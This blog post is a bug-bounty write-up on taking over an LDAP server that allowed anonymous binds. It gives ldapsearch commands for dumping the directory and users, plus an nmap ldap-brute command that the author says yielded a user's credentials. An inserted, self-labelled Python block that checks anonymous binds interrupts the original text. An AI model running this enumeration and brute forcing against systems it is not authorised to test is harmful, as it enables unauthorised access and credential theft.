How to Take Over an LDAP Server.

Ashish Kunwar
Oct 25 · 2 min read

Intro

LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. — read here

I chose a random paying target, REDACTED.com, which runs a responsible disclosure program.

As usual I started my personal tool "BREXET", which gathered lots of subdomains and ran nmap over every one of them. I went through the output and found an interesting port, 389, with anonymous bind enabled.

It can also be found using Shodan; use the Shodan query: ssl:target Port:"389"

Anonymous LDAP binding allows a client to connect to and search the directory (bind and search) without logging in; you do not need to supply a binddn or bindpasswd.
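What that anonymous bind actually looks like on the wire, and a way for an administrator to confirm that their own server refuses it once anonymous binds are disabled. This is an added example, not code from the original post: it hand-encodes the LDAPv3 BindRequest and decodes the BindResponse (RFC 4511) with the standard library only, so no LDAP client library is needed; the `RESULT_CODES` table and the `anonymous_bind_allowed` helper are my own naming, and a server that disallows anonymous binds (for example OpenLDAP with `disallow bind_anon`) answers with result code 48, inappropriateAuthentication.

```python
import socket
# LDAP result codes (RFC 4511) that a bind commonly returns.
RESULT_CODES = {0: "success", 48: "inappropriateAuthentication",
                49: "invalidCredentials", 53: "unwillingToPerform"}

def ber(tag: int, content: bytes) -> bytes:
    """One BER TLV with a definite length (long form when content exceeds 127 bytes)."""
    n = len(content)
    raw = n.to_bytes((n.bit_length() + 7) // 8 or 1, "big")
    length = bytes([n]) if n < 0x80 else bytes([0x80 | len(raw)]) + raw
    return bytes([tag]) + length + content

def ber_int(value: int) -> bytes:
    """BER INTEGER for a non-negative value (a leading 0x00 keeps the sign bit clear)."""
    return ber(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))

def bind_request(msg_id: int, dn: bytes = b"", password: bytes = b"") -> bytes:
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] { version 3, name, simple [0] } }.
    Empty name + empty simple password = the anonymous bind 'ldapsearch -x' sends without -D/-w."""
    bind = ber(0x02, b"\x03") + ber(0x04, dn) + ber(0x80, password)
    return ber(0x30, ber_int(msg_id) + ber(0x60, bind))

def _tlv(data: bytes, pos: int = 0):
    """Read one TLV at pos; return (tag, content, position after it)."""
    tag, n = data[pos], data[pos + 1]
    pos += 2
    if n & 0x80:  # long-form length: low 7 bits give the number of length bytes
        k = n & 0x7F
        n, pos = int.from_bytes(data[pos:pos + k], "big"), pos + k
    return tag, data[pos:pos + n], pos + n

def parse_bind_response(data: bytes) -> dict:
    """Decode LDAPMessage { messageID, BindResponse [APPLICATION 1] } into its LDAPResult fields."""
    tag, msg, _ = _tlv(data)
    assert tag == 0x30, "not an LDAPMessage"
    _, msg_id, pos = _tlv(msg)
    tag, result, _ = _tlv(msg, pos)
    assert tag == 0x61, "not a BindResponse"
    _, code, pos = _tlv(result)             # resultCode ENUMERATED
    _, matched_dn, pos = _tlv(result, pos)  # matchedDN
    _, diag, _ = _tlv(result, pos)          # diagnosticMessage
    rc = int.from_bytes(code, "big")
    return {"msg_id": int.from_bytes(msg_id, "big"), "result_code": rc,
            "result": RESULT_CODES.get(rc, "other"),
            "matched_dn": matched_dn.decode(), "diagnostic": diag.decode(errors="replace")}

def anonymous_bind_allowed(host: str, port: int = 389, timeout: float = 5.0) -> bool:
    """Send one anonymous bind to a server you administer; True means the server accepted it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(bind_request(1))
        return parse_bind_response(sock.recv(4096))["result_code"] == 0
```

`bind_request(1)` produces the 14-byte message `30 0c 02 01 01 60 07 02 01 03 04 00 80 00`, which is what you will see in a packet capture whenever a client binds anonymously.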

Now we can search for the base DN (the root DSE) with an ldapsearch query:

ldapsearch -h <TARGET IP> -p 389 -x -s base -b '' "(objectClass=*)" "*" +

This is just a small glimpse of what the output looks like.

Now take note of the naming context (base DN); with this we can enumerate LDAP users, their access details, UIDs, etc.

defaultnamingcontext: dc=xxx,dc=xxx,dc=xx

We are going to use this command:

ldapsearch -h <TARGET IP> -p 389 -x -b "dc=xxx,dc=xxx,dc=xx"

There were lots of users; here is what one user's LDAP entry looks like:

# aab, users, compat, domain_name
dn: uid=aab,cn=users,cn=compat,dc=xxx,dc=xxx,dc=xx
objectClass: posixAccount
objectClass: ipaOverrideTarget
objectClass: top
gecos: name_here
cn: name_here
uidNumber: 1019XXXXXXX
gidNumber: 1019XXXXXXX
loginShell: /bin/bash
homeDirectory: /home/aab
ipaAnchorUUID:: xxxxxxxxx
uid: aab

Now, with this, an attacker can try brute-forcing passwords, or check usernames and passwords against a default list using nmap:

nmap -p 389 --script ldap-brute --script-args ldap.base='"dc=xxx,dc=xxxx,dc=xx"' <target ip>

#Note: You can use JXplorer to do the same; just connect to the port with it.

#Note: Run the nmap scan on all subdomains if the target scope is big.

With this I got lucky and got an LDAP user's credentials (thanks to nmap).

Once you get access, use JXplorer to explore the directory.

After reporting it, I earned a good bounty.

#If you have any questions, just DM me on Twitter.

Ashish Kunwar

Written by

I'm a security researcher and exploit developer, and I love fuzzing and breaking things | bug hunter at Bugcrowd & HackerOne (0x01)
